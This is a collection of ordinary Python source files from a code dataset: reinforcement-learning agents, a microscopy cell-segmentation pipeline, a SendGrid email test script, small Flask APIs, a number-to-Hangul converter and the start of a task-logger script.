600\n\n # Provide the number of time steps per atomic action.\n timesteps_per_action = 15\n\n # ======================================================================= #\n # Step 2. Design environment #\n # #\n # a. Designer must provide the original UMDP (S,A,T,G,R). #\n # - The S,A,T components can be fulfilled by providing the Mujoco #\n # model. #\n # - The user must separately specifiy the initial state space. #\n # - G can be provided by specifying the end goal space. #\n # - R, which by default uses a shortest path {-1,0} reward function, #\n # can be implemented by specifying two components: (i) a function #\n # that maps the state space to the end goal space and (ii) the end #\n # goal achievement thresholds for each dimensions of the end goal. #\n # #\n # b. In order to convert the original UMDP into a hierarchy of k UMDPs, #\n # the designer must also provide #\n # - The subgoal action space, A_i, for all higher-level UMDPs i > 0 #\n # - R_i for levels 0 <= i < k-1 (i.e., all levels that try to achieve #\n # goals in the subgoal space). As in the original UMDP, R_i can be #\n # implemented by providing two components: (i) a function that maps #\n # the state space to the subgoal space and (ii) the subgoal #\n # achievement thresholds. #\n # #\n # c. Designer should also provide subgoal and end goal visualization #\n # functions in order to show video of training. These can be updated #\n # in \"display_subgoal\" and \"display_end_goal\" methods in the #\n # \"environment.py\" file. #\n # ======================================================================= #\n\n # Provide file name of Mujoco model(i.e., \"pendulum.xml\"). Make sure file\n # is stored in \"mujoco_files\" folder\n model_name = \"ur5.xml\"\n\n # Provide initial state space consisting of the ranges for all joint angles\n # and velocities. In the UR5 Reacher task, we use a random initial shoulder\n # position and use fixed values for the remainder. Initial joint velocities\n # are set to 0.\n initial_joint_pos = [(-np.pi / 8, np.pi / 8),\n (3.22757851e-03, 3.22757851e-03),\n (-1.27944547e-01, -1.27944547e-01)]\n initial_joint_speed = [(0, 0) for _ in range(len(initial_joint_pos))]\n initial_state_space = initial_joint_pos + initial_joint_speed\n\n # Provide end goal space. The code supports two types of end goal spaces if\n # user would like to train on a larger end goal space. If user needs to\n # make additional customizations to the end goals, the \"get_next_goal\"\n # method in \"environment.py\" can be updated.\n\n # In the UR5 reacher environment, the end goal will be the desired joint\n # positions for the 3 main joints.\n goal_space_train = [(-np.pi, np.pi), (-np.pi/4, 0), (-np.pi/4, np.pi/4)]\n goal_space_test = [(-np.pi, np.pi), (-np.pi/4, 0), (-np.pi/4, np.pi/4)]\n\n # Provide a function that maps from the state space to the end goal space.\n # This is used to determine whether the agent should be given the sparse\n # reward. It is also used for Hindsight Experience Replay to determine\n # which end goal was achieved after a sequence of actions.\n\n # Supplementary function that will ensure all angles are between\n # [-2*np.pi,2*np.pi]\n\n def bound_angle(angle):\n bounded_angle = np.absolute(angle) % (2 * np.pi)\n if angle < 0:\n bounded_angle = -bounded_angle\n return bounded_angle\n\n def project_state_to_end_goal(sim, *_):\n return np.array([bound_angle(sim.data.qpos[i])\n for i in range(len(sim.data.qpos))])\n\n # Set end goal achievement thresholds. If the agent is within the threshold\n # for each dimension, the end goal has been achieved and the reward of 0 is\n # granted.\n angle_threshold = np.deg2rad(10)\n end_goal_thresholds = np.array([angle_threshold for _ in range(3)])\n\n # Provide range for each dimension of subgoal space in order to configure\n # subgoal actor networks. Subgoal space can be the same as the state space\n # or some other projection out of the state space. In our implementation of\n # the UR5 reacher task, the subgoal space is the state space, which is the\n # concatenation of all joint positions and joint velocities.\n subgoal_bounds = np.array([[-2 * np.pi, 2 * np.pi],\n [-2 * np.pi, 2 * np.pi],\n [-2 * np.pi, 2 * np.pi],\n [-4, 4],\n [-4, 4],\n [-4, 4]])\n\n # Provide state to subgoal projection function.\n def project_state_to_subgoal(sim, *_):\n return np.concatenate((\n np.array([bound_angle(sim.data.qpos[i])\n for i in range(len(sim.data.qpos))]),\n np.array([4 if sim.data.qvel[i] > 4 else -4\n if sim.data.qvel[i] < -4 else sim.data.qvel[i]\n for i in range(len(sim.data.qvel))])\n ))\n\n # Set subgoal achievement thresholds\n velo_threshold = 2\n subgoal_thresholds = np.concatenate(\n (np.array([angle_threshold for _ in range(3)]),\n np.array([velo_threshold for _ in range(3)])))\n\n # To properly visualize goals, update \"display_end_goal\" and\n # \"display_subgoals\" methods in \"environment.py\"\n\n # ======================================================================= #\n # Step 3. Set miscellaneous hyperparameters #\n # #\n # Below are some other agent hyperparameters that can affect results, #\n # including #\n # #\n # a. Subgoal testing percentage #\n # b. Subgoal penalty #\n # c. Exploration noise #\n # d. Replay buffer size #\n # #\n # For other relevant agent hyperparameters, refer to the \"agent.py\" and #\n # \"layer.py\" files. #\n # ======================================================================= #\n\n agent_params = {\n # Define percentage of actions that a subgoal level (i.e. level i > 0)\n # will test subgoal actions\n \"subgoal_test_perc\": 0.3,\n\n # Define subgoal penalty for missing subgoal. Please note that by\n # default the Q value target for missed subgoals does not include\n # Q-value of next state (i.e, discount rate = 0). As a result, the\n # Q-value target for missed subgoal just equals penalty. For instance\n # in this 3-level UR5 implementation, if a level proposes a subgoal and\n # misses it, the Q target value for this action would be -10. To\n # incorporate the next state in the penalty, go to the\n # \"penalize_subgoal\" method in the \"layer.py\" file.\n \"subgoal_penalty\": -flags.time_scale,\n\n # Define exploration noise that is added to both subgoal actions and\n # atomic actions.\n # Noise added is Gaussian N(0, noise_percentage * action_dim_range)\n \"atomic_noise\": [0.1 for _ in range(3)],\n \"subgoal_noise\": [0.03 for _ in range(6)],\n\n # Define number of episodes of transitions to be stored by each level\n # of the hierarchy\n \"episodes_to_store\": 500,\n\n # Provide training schedule for agent. Training by default will\n # alternate between exploration and testing. Hyperparameter below\n # indicates number of exploration episodes. Testing occurs for 100\n # episodes. To change number of testing episodes, go to \"ran_HAC.py\".\n \"num_exploration_episodes\": 50\n }\n\n # ======================================================================= #\n # Step 4: Instantiate and return agent and environment. #\n # ======================================================================= #\n\n env = UR5(model_name, goal_space_train, goal_space_test,\n project_state_to_end_goal, end_goal_thresholds,\n initial_state_space, subgoal_bounds,\n project_state_to_subgoal, subgoal_thresholds,\n max_actions, timesteps_per_action, flags.show)\n\n agent = Agent(flags, env, agent_params)\n\n return agent, env\n","sub_path":"example_designs/ur5.py","file_name":"ur5.py","file_ext":"py","file_size_in_byte":11124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518438374","text":"\nimport math, random\n\nimport gym\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torch.nn.functional as F\n\nfrom common.layers import NoisyLinear\nfrom common.replay_buffer import ReplayBuffer\nfrom common.replay_buffer import PrioritizedReplayBuffer\n\nfrom common.wrappers import make_atari, wrap_deepmind, wrap_pytorch\n\nUSE_CUDA = torch.cuda.is_available()\nVariable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs).cuda() if USE_CUDA else autograd.Variable(*args,**kwargs)\n\n\nfrom utils.hyperparameters import Config\n\nconfig = Config()\n\nconfig.num_atoms = 51\nconfig.Vmin = -200\nconfig.Vmax = 200\n\nconfig.num_frames = 1000000\nconfig.batch_size = 32\nconfig.gamma = 0.99\n\nconfig.epsilon_start = 1.0\nconfig.epsilon_final = 0.01\nconfig.epsilon_decay = 500\n\nconfig.learning_rate=1e-3\nconfig.gamma=0.99\nconfig.buffer_size=10000\nconfig.replace_iter_num=1000\nconfig.use_noisy=True\nconfig.n_step=3\n\nconfig.prioritized_replay=True\nconfig.prioritized_replay_alpha =0.6\nconfig.prioritized_replay_beta= 0.4\n\nconfig.hidden_before=[32,64]\nconfig.hidden_after=[32,64]\n\n\nclass Agent:\n def __init__(self,oEnv):\n self.num_atoms = config.num_atoms\n self.Vmin = config.Vmin\n self.Vmax = config.Vmax\n\n self.num_frames = config.num_frames\n self.batch_size = config.batch_size\n self.gamma = config.gamma\n\n self.epsilon_start = config.epsilon_start\n self.epsilon_final =config.epsilon_final\n self.epsilon_decay = config.epsilon_decay\n\n self.learning_rate = config.learning_rate\n self.gamma=config.gamma\n self.buffer_size = config.buffer_size\n self.replace_iter_num =config.replace_iter_num\n self.use_noisy =config.use_noisy\n self.n_step = config.n_step\n\n self.prioritized_replay=config.prioritized_replay\n self.prioritized_replay_alpha=config.prioritized_replay_alpha\n self.prioritized_replay_beta=config.prioritized_replay_beta\n\n self.hidden_before=config.hidden_before\n self.hidden_after=config.hidden_after\n\n\n self.epsilon_by_frame = lambda frame_idx: self.epsilon_final + (self.epsilon_start - self.epsilon_final) * math.exp(-1. * frame_idx / self.epsilon_decay)\n\n self.env=oEnv\n self.nstep_buffer=[]\n\n if self.prioritized_replay:\n self.replay_buffer=PrioritizedReplayBuffer(self.buffer_size,alpha=self.prioritized_replay_alpha)\n else:\n self.replay_buffer = ReplayBuffer(self.buffer_size)\n\n self.current_model = RainbowDQN(oEnv,oEnv.observation_space.shape, oEnv.action_space.n, self.num_atoms,\n self.Vmin, self.Vmax,self.use_noisy,hidden_before=self.hidden_before,hidden_after=self.hidden_after)\n self.target_model = RainbowDQN(oEnv,oEnv.observation_space.shape, oEnv.action_space.n, self.num_atoms,\n self.Vmin, self.Vmax,self.use_noisy,hidden_before=self.hidden_before,hidden_after=self.hidden_after)\n if USE_CUDA:\n current_model = self.current_model.cuda()\n target_model = self.target_model.cuda()\n\n self.optimizer = optim.Adam(current_model.parameters(), self.learning_rate)\n\n self.update_target(current_model, target_model)\n\n\n def update_target(self,current_model, target_model):\n target_model.load_state_dict(current_model.state_dict())\n\n def projection_distribution(self,next_state, rewards, dones):\n batch_size = next_state.size(0)\n\n delta_z = float(self.Vmax - self.Vmin) / (self.num_atoms - 1)\n support = torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n\n next_dist = self.target_model(next_state).data.cpu()\n\n next_dist_action = next_dist * support\n # print(\"next\",next_dist.shape,next_dist_action.shape)\n next_action = next_dist_action.sum(2).max(1)[1]\n next_action = next_action.unsqueeze(1).unsqueeze(1).expand(next_dist.size(0), 1, next_dist.size(2))\n next_dist = next_dist.gather(1, next_action).squeeze(1)\n\n rewards = rewards.unsqueeze(1).expand_as(next_dist)\n dones = dones.unsqueeze(1).expand_as(next_dist)\n support = support.unsqueeze(0).expand_as(next_dist)\n\n Tz = rewards + (1 - dones) * (self.gamma**self.n_step) * support\n Tz = Tz.clamp(min=self.Vmin, max=self.Vmax)\n b = (Tz - self.Vmin) / delta_z\n l = b.floor().long()\n u = b.ceil().long()\n equal = l == u\n offset = torch.linspace(0, (batch_size - 1) * self.num_atoms, batch_size).long().unsqueeze(1).expand(batch_size,self.num_atoms)\n\n proj_dist = torch.zeros(next_dist.size())\n proj_dist.view(-1).index_add_(0, (l + offset).view(-1),\n (next_dist * (u.float() - b + equal.float())).view(-1))\n proj_dist.view(-1).index_add_(0, (u + offset).view(-1), (next_dist * (b - l.float())).view(-1))\n\n return proj_dist\n\n def compute_td_loss(self,batch_size):\n if self.prioritized_replay:\n state, action, reward, next_state, done, weights, indices = self.replay_buffer.sample(batch_size, self.prioritized_replay_beta)\n weights=Variable(torch.FloatTensor(weights))\n else:\n state, action, reward, next_state, done = self.replay_buffer.sample(batch_size)\n weights=1\n\n state = Variable(torch.FloatTensor(np.float32(state)))\n next_state = Variable(torch.FloatTensor(np.float32(next_state)), volatile=True)\n action = Variable(torch.LongTensor(action))\n\n if self.num_atoms > 1:\n reward = torch.FloatTensor(reward)\n done = torch.FloatTensor(np.float32(done))\n proj_dist = self.projection_distribution(next_state, reward, done)\n dist = self.current_model(state)\n action = action.unsqueeze(1).unsqueeze(1).expand(batch_size, 1, self.num_atoms)\n dist = dist.gather(1, action).squeeze(1)\n dist.data.clamp_(0.01, 0.99)\n loss = -(Variable(proj_dist) * dist.log()).sum(1)*weights\n prios = loss + 1e-5\n else:\n reward = Variable(torch.FloatTensor(reward))\n done = Variable(torch.FloatTensor(np.float32(done)))\n q_values = self.current_model(state)\n next_q_values = self.target_model(next_state)\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n\n expected_q_value = reward + (self.gamma **self.n_step)* next_q_value * (1 - done)\n loss = (q_value - Variable(expected_q_value.detach())).pow(2)*weights\n prios = loss + 1e-5\n\n loss = loss.mean()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.prioritized_replay:\n self.replay_buffer.update_priorities(indices,prios.data.cpu().numpy())\n\n self.current_model.reset_noise()\n self.target_model.reset_noise()\n\n return loss\n\n def append_to_replay(self,s, a, r, s_, done):\n self.nstep_buffer.append((s, a, r, s_, done))\n if len(self.nstep_buffer) < self.n_step:\n return\n R = sum([self.nstep_buffer[i][2] * (self.gamma ** i) for i in range(self.n_step)])\n state, action, _, _, _ = self.nstep_buffer.pop(0)\n self.replay_buffer.push(state, action, R, s_, done)\n\n def finish_nstep(self,):\n while (len(self.nstep_buffer) > 0):\n R = sum([self.nstep_buffer[i][2] * (self.gamma ** i) for i in range(len(self.nstep_buffer))])\n state, action, reward, state_, _ = self.nstep_buffer.pop(0)\n self.replay_buffer.push(state, action, R, state_, True)\n\n def Train(self,):\n losses = []\n all_rewards = []\n episode_reward = 0\n oEnv=self.env\n\n state = oEnv.reset()\n for frame_idx in range(1, self.num_frames + 1):\n epsilon = self.epsilon_by_frame(frame_idx)\n action = self.current_model.act(state, epsilon)\n\n next_state, reward, done, _ = oEnv.step(action)\n\n # oEnv.render()\n self.append_to_replay(state, action, reward, next_state, done)\n\n state = next_state\n episode_reward += reward\n\n if done:\n self.finish_nstep()\n state = oEnv.reset()\n all_rewards.append(episode_reward)\n episode_reward = 0\n\n if len(self.replay_buffer) > self.batch_size:\n loss = self.compute_td_loss(self.batch_size)\n losses.append(loss.data[0])\n\n if frame_idx % self.replace_iter_num == 0:\n self.update_target(self.current_model, self.target_model)\n\n if frame_idx % 3000 == 0:\n print(\"frame\", frame_idx)\n\nclass RainbowDQN(nn.Module):\n def __init__(self, oEnv,input_shape, num_actions, num_atoms, Vmin, Vmax,use_noisy,hidden_before,hidden_after):\n super(RainbowDQN, self).__init__()\n self.env=oEnv\n self.input_shape = input_shape\n self.num_actions = num_actions\n self.num_atoms = num_atoms\n self.Vmin = Vmin\n self.Vmax = Vmax\n self.use_noisy=use_noisy\n\n self.features = nn.Sequential(\n nn.Conv2d(input_shape[0], 32, kernel_size=8, stride=4),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n # self.linear1 = nn.Linear(self.feature_size(), 32)\n # self.linear2 = nn.Linear(32, 64)\n\n if self.use_noisy:\n self.value1 = NoisyLinear(self.feature_size(), 512, use_cuda=USE_CUDA)\n self.value2 = NoisyLinear(512, self.num_atoms, use_cuda=USE_CUDA)\n\n self.advantage1 = NoisyLinear(self.feature_size(), 512, use_cuda=USE_CUDA)\n self.advantage2 = NoisyLinear(512, self.num_atoms * self.num_actions, use_cuda=USE_CUDA)\n else:\n self.value1= nn.Linear(self.feature_size(), 512)\n self.value2= nn.Linear(512, self.num_atoms)\n self.advantage1=nn.Linear(self.feature_size(), 512)\n self.advantage2=nn.Linear(512, self.num_atoms * self.num_actions)\n\n def feature_size(self):\n return self.features(autograd.Variable(torch.zeros(1, *self.input_shape))).view(1, -1).size(1)\n\n\n def forward(self, x):\n batch_size = x.size(0)\n\n x = x / 255.\n x = self.features(x)\n x = x.view(batch_size, -1)\n\n value = F.relu(self.value1(x))\n value = self.value2(value)\n\n advantage = F.relu(self.advantage1(x))\n advantage = self.advantage2(advantage)\n\n if self.num_atoms>1:\n value = value.view(batch_size, 1, self.num_atoms)\n advantage = advantage.view(batch_size, self.num_actions, self.num_atoms)\n\n x = value + advantage - advantage.mean(1, keepdim=True)\n x = F.softmax(x.view(-1, self.num_atoms)).view(-1, self.num_actions, self.num_atoms)\n # x=F.softmax(x,-1)\n else:\n x=value+advantage-advantage.mean()\n\n return x\n\n def reset_noise(self):\n if self.use_noisy:\n self.value1.reset_noise()\n self.value2.reset_noise()\n self.advantage1.reset_noise()\n self.advantage2.reset_noise()\n\n def act(self, state,epsilon=0.02):\n if random.random() < epsilon:\n action = random.randrange(self.env.action_space.n)\n else:\n if self.num_atoms>1:\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n dist = self.forward(state).data.cpu()\n dist = dist * torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n action = dist.sum(2).max(1)[1].numpy()[0]\n else:\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n q_value = self.forward(state)\n action = q_value.max(1)[1].cpu().numpy()[0]\n\n return action\n\n\nclass MyReward(gym.Wrapper):\n def __init__(self, env):\n super(MyReward, self).__init__(env)\n self.m_RwardList = []\n self.m_Lost=[]\n self.m_count = 0\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n # reward=0\n self.m_count += 1\n # print(\"reware\",self.m_count,action,reward,done,info)\n if reward>0:\n self.m_RwardList.append(reward)\n elif reward<0:\n self.m_Lost.append(reward)\n if done:\n # if info[\"done\"]:\n # reward=100\n # self.m_RwardList.append(reward)\n iMeanReward = np.sum(self.m_RwardList)\n iLost = np.sum(self.m_Lost)\n print(\"mean_reward\", iMeanReward,iLost)\n self.m_RwardList = []\n self.m_Lost = []\n return obs, reward, done, info\n\n\ndef Train():\n env_id = \"PongNoFrameskip-v4\"\n oEnv = make_atari(env_id)\n print(\"atari\",oEnv)\n oEnv = wrap_deepmind(oEnv)\n oEnv = wrap_pytorch(oEnv)\n oEnv = MyReward(oEnv)\n agent = Agent(oEnv)\n agent.Train()\n\n\n\nif __name__==\"__main__\":\n Train()","sub_path":"Torch/torch_cnn_rainbow.py","file_name":"torch_cnn_rainbow.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146349064","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\"\"\"\nimport click\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport skimage\nfrom scipy import ndimage as ndi\nfrom PIL import Image\nimport gzip\nimport matplotlib.patches as mpatches\n\nfrom Segmentation_pipeline_helper import find, watershed_lab, resize_pad\nfrom Segmentation_pipeline_helper import shift_center_mass, pixel_norm\n\n############################################\n# EXECUTION PIPELINE FOR CELL SEGMENTATION #\n############################################\n\n\ndef extract_img_arrays(microtubule_imgs, protein_imgs, nuclei_imgs):\n \"\"\"\n Extract the numerical arrays that represent the input images.\n Extracts only the relevant channel of the input image if it is RGB,\n blue for nuclei, red for microtubule, and green for proteins.\n\n This always results in every returned array being 2D (grayscale).\n\n The function assumes that all the input lists are of the same length.\n If an image is missing, all channels on the same index will be skipped.\n\n Arguments:\n microtubule_imgs: A list of paths to microtubule images.\n protein_imgs: A list of paths to protein images.\n nuclei_imgs: A list of paths to nuclei images.\n\n Returns:\n A generator which yields grayscale image tuples from the input images.\n (grayscale microtubule, grayscale protein, grayscale nuclei).\n\n Raises:\n IndexError: if the input lists are not the same size.\n \"\"\"\n image_arrays = []\n num_images = len(nuclei_imgs)\n for index in range(num_images):\n nuclei_img = nuclei_imgs[index]\n microtubule_img = microtubule_imgs[index]\n protein_img = protein_imgs[index]\n\n current_array = []\n\n for i, img in enumerate([microtubule_img, protein_img, nuclei_img]):\n try:\n if img.endswith('.gz'):\n file_handle = gzip.open(img)\n else:\n file_handle = open(img)\n img_arr = plt.imread(file_handle)\n file_handle.close()\n\n if len(img_arr.shape) > 2:\n img_arr = img_arr[:, :, i]\n current_array.append(img_arr)\n\n except IOError as e:\n logging.error('{}, when reading {}'.format(e, img))\n\n yield current_array\n\n\ndef plot_boundaries(nucleus_array, regions):\n fig, ax = plt.subplots(figsize=(10, 6))\n ax.imshow(nucleus_array)\n for region in regions:\n # take regions with large enough areas\n if region.area >= 20000:\n # draw rectangle around segmented coins\n minr, minc, maxr, maxc = region.bbox\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n fill=False, edgecolor='red', linewidth=2)\n ax.add_patch(rect)\n ax.set_axis_off()\n plt.tight_layout()\n plt.show()\n\n\ndef cut_bounding_box(im_arrays, plot=False):\n \"\"\"\n Cut out individual cells from images.\n Each of the arguments to this function should be lists of the same length.\n The elements on the same index in the different arrays are assumed to be\n from the same original image.\n\n Arguments:\n microtubule_arrays: A list of grayscale microtubule image arrays.\n protein_arrays: A list of grayscale protein image arrays.\n nuclei_arrays: A list of grayscale nuclei image arrays.\n\n Returns:\n A generator which yields a list of cell arrays for each image\n in succession.\n \"\"\"\n images = []\n for arrays in im_arrays:\n cells = []\n seeds, num = watershed_lab(arrays[2], rm_border=True)\n\n regions = skimage.measure.regionprops(seeds)\n if plot:\n plot_boundaries(arrays[2], regions)\n\n for i, region in enumerate(regions):\n minr, minc, maxr, maxc = region.bbox\n mask = seeds[minr:maxr, minc:maxc].astype(np.uint8)\n mask[mask != region.label] = 0\n mask[mask == region.label] = 1\n\n cell_nuclei = pixel_norm(arrays[2][minr:maxr, minc:maxc] * mask)\n cell_nucleoli = pixel_norm(arrays[1][minr:maxr, minc:maxc] * mask)\n cell_microtubule = np.full_like(cell_nuclei, 0)\n\n cell = np.dstack((cell_microtubule, cell_nucleoli, cell_nuclei))\n cell = (cell * 255).astype(np.uint8) # the input file was uint16\n\n # Align cell orientation\n theta = region.orientation * 180 / np.pi # radiant to degree\n cell = ndi.rotate(cell, 90 - theta)\n\n cells.append(cell)\n yield cells\n\n return images\n\n\n@click.command()\n@click.argument('imageinput')\n@click.argument('imageoutput')\n@click.option('--blue-suffix', default='blue.tif.gz',\n help='Set the blue image suffix')\n@click.option('--green-suffix', default='green.tif.gz',\n help='Set the green image suffix')\n@click.option('--red-suffix', default='red.tif.gz',\n help='Set the red image suffix')\n@click.option('--plot-boundaries', default=False, is_flag=True)\n@click.option('--verbose', default=False, is_flag=True)\ndef main(imageinput, imageoutput, blue_suffix, green_suffix, red_suffix,\n verbose, plot_boundaries):\n if not os.path.exists(imageoutput):\n os.makedirs(imageoutput)\n\n if verbose:\n numeric_level = getattr(logging, 'INFO')\n logging.basicConfig(level=numeric_level)\n\n nuclei_imgs = find(imageinput, suffix=blue_suffix, recursive=False)\n microtubule_imgs = []\n protein_imgs = []\n logging.info('Finding images')\n\n for nucleus_img in nuclei_imgs:\n microtubule_imgs.append(nucleus_img.replace(blue_suffix, red_suffix))\n protein_imgs.append(nucleus_img.replace(blue_suffix, green_suffix))\n\n logging.info('Setting up extraction')\n im_arrays = extract_img_arrays(microtubule_imgs, protein_imgs, nuclei_imgs)\n\n logging.info('Setting up bounding box separation')\n cells = cut_bounding_box(im_arrays, plot=plot_boundaries)\n\n if plot_boundaries:\n logging.info('Segmentation plots enabled')\n logging.info('Segmenting')\n for i, (image, filename) in enumerate(zip(cells, nuclei_imgs)):\n if verbose:\n progress = i / len(nuclei_imgs) * 100\n print('\\r{:.2f}% done'.format(progress), end='', flush=True)\n\n filename = filename.replace(blue_suffix, '')\n filename = os.path.basename(filename)\n filename = os.path.join(imageoutput, filename)\n\n for i, cell in enumerate(image):\n fig = resize_pad(cell)\n fig = shift_center_mass(fig)\n fig = Image.fromarray(fig)\n\n savename = filename + str(i) + '.png'\n fig.save(savename)\n\n if verbose:\n print()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Segmentation_pipeline_nuclei.py","file_name":"Segmentation_pipeline_nuclei.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"145890004","text":"# import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import (Mail, Attachment, FileContent, FileName, FileType, Disposition)\nimport base64\n\nmessage = Mail(\n from_email='pepito@bellako.cl',\n to_emails='empatiaindustries@gmail.com',\n subject='Urgente tu cuenta se suspendera por no pago',\n html_content='

Tu cuenta nos debe un total de : 130 pesos

'\n)\n\nwith open(\"documento de prueba.pdf\", \"rb\") as f:\n data = f.read()\n f.close()\n\nencoded = base64.b64encode(data).decode()\n\nattachedFile = Attachment(\n FileContent(encoded),\n FileName('attachment.pdf'),\n FileType('application/pdf'),\n Disposition('attachment')\n)\n\nmessage.attachment = attachedFile\n\nsg = SendGridAPIClient(\"api key sengrid\")\nresponse = sg.send(message)\n\nprint(f\"\"\"\n status_code: {response.status_code}\n\n body: {response.body}\n\"\"\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"627415197","text":"from flask import Flask, request, jsonify, render_template\nimport requests\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"oh-so-secret\"\n\nBASE_URL = \"http://numbersapi.com\"\n\n\n@app.route(\"/\")\ndef homepage():\n \"\"\"Show homepage.\"\"\"\n\n return render_template(\"index.html\")\n\n\n\"\"\"\"Get number data from API \"\"\"\n@app.route(\"/api/get-lucky-num\", methods=[\"POST\"])\ndef post_api():\n \"\"\"Post to API\"\"\"\n\n name = request.json[\"name\"]\n email = request.json[\"email\"]\n year = request.json[\"year\"]\n color = request.json[\"color\"]\n\n # check for valid inputs and return errors in JSON\n if name == \"\" or name.isspace() or color not in [\"red\", \"green\", \"orange\", \"blue\"] or year == \"\" or year.isspace():\n errors = []\n if name == \"\" or name.isspace():\n name = {\"name\": \"Name is required\"}\n errors.append(name)\n\n if year == \"\" or year.isspace():\n year = {\"year\": \"Year is required\"}\n errors.append(year)\n\n if color not in [\"red\", \"green\", \"orange\", \"blue\"]:\n color = {\n \"color\": \"Invalid color, must be one of: red, green, orange, blue\"}\n errors.append(color)\n return (jsonify(errors=errors), 201)\n\n else:\n\n random_num_resp = requests.get(url=f\"{BASE_URL}/random?json\")\n year_resp = requests.get(url=f\"{BASE_URL}/{year}?json\")\n\n num_json = random_num_resp.json()\n year_json = year_resp.json()\n\n # JSON response\n resp_json = {\n \"num\": {\n \"fact\": num_json[\"text\"],\n \"num\": num_json[\"number\"]\n },\n \"year\": {\n \"fact\": year_json[\"text\"],\n \"year\": year_json[\"number\"]\n }\n }\n return (resp_json, 201)\n","sub_path":"Part 3 - Lucky Nums/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308448353","text":"##-*- coding: utf-8 -*-\n#!/usr/bin/python\n\"\"\"\nNumber to Hangul string util.\n\"\"\"\n\n__author__ = 'SeomGi, Han'\n__credits__ = ['SeomGi, Han']\n__copyright__ = 'Copyright 2015, Python Utils Project'\n\n__license__ = 'MIT'\n__version__ = '0.0.1'\n__maintainer__ = 'SeomGi, Han'\n__email__ = 'iandmyhand@gmail.com'\n__status__ = 'Production'\n\n\nHANGUL_NUMBER = [\n '', '일', '이', '삼', '사', '오', '육', '칠', '팔', '구', '십'\n]\nHANGUL_NUMBER_UNIT = [\n '', '십', '백', '천'\n]\nHANGUL_NUMBER_BIG_UNIT = [\n '', '만', '억', '조', '경', '해'\n]\n\n\nclass NumberUtils:\n\n _int_value = 0\n _string_value = ''\n _len_string_value = 0\n\n def __init__(self, int_value=0):\n self._int_value = int_value\n self._string_value = str(self._int_value)\n self._len_string_value = len(self._string_value)\n\n def convert_to_hangul_string(self):\n \"\"\"\n usage:\n numberutils.NumberUtils(220000112490).convert_to_hangul_string() == '이천이백억일십일만이천사백구십'\n \"\"\"\n\n result = ''\n if self._string_value and self._string_value.isdigit():\n index = 0\n while index < self._len_string_value:\n single_result = ''\n hangul_number = HANGUL_NUMBER[int(self._string_value[index])]\n if hangul_number:\n unit_index = ((self._len_string_value - index) % 4) - 1\n single_result += hangul_number + HANGUL_NUMBER_UNIT[unit_index]\n if (self._len_string_value - index - 1) % 4 == 0:\n big_unit_index = (self._len_string_value - index - 1) // 4\n if len(HANGUL_NUMBER_BIG_UNIT) > big_unit_index:\n single_result += HANGUL_NUMBER_BIG_UNIT[big_unit_index]\n result += single_result\n index += 1\n\n return result\n","sub_path":"loan_contracts/utils/numberutils.py","file_name":"numberutils.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"319647613","text":"#!/env/bin/python\nfrom flask import Flask, jsonify, request, abort\n\napp = Flask(__name__)\nvms = [\n\t{ \n\t'id':1,\n\t'name':'andev10hisge001',\n\t'moref':'234234ewfwfw',\n\t}\n]\n\n@app.route('/vm/v1.0/vms', methods=['GET'])\ndef get_vms():\n\treturn jsonify({'vms': vms})\n\n@app.route('/vm/v1.0/vms', methods=['POST'])\ndef add_vms():\n\tif not request.json or not 'name' in request.json:\n\n\t\tabort(400)\n\tvm = {\n\t\t'id': vms[-1]['id'] + 1,\n\t\t'name': request.json['name']\n\t}\n\tvms.append(vm)\n\treturn jsonify({'vm': vm}), 201\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424902078","text":"from datetime import datetime\nimport os\nimport time\n\n#handy script to clean the screen/make the program look nice\ndef clearscreen():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n#how each task is constructed\n #name\n #date of task\n #time taken\n #extra notes\nclass Task():\n def __init__(self):\n pass\n\n #asks the user for a task name\n def get_task_name(self):\n clearscreen()\n name = input(\"Task Name: \")\n if name.upper != \"BACK\":\n self.name = name.upper()\n #asks the user for a task time\n def get_time(self):\n clearscreen()\n self.time = False\n while self.time == False:\n try:\n time = input('How long was the task?(Only Enter Min): ')\n self.time = str(int(time))\n except ValueError:\n print('Thats not a number!')\n #asks the user for extra notes\n def get_remarks(self):\n clearscreen()\n extra = input(\"Additional Notes? 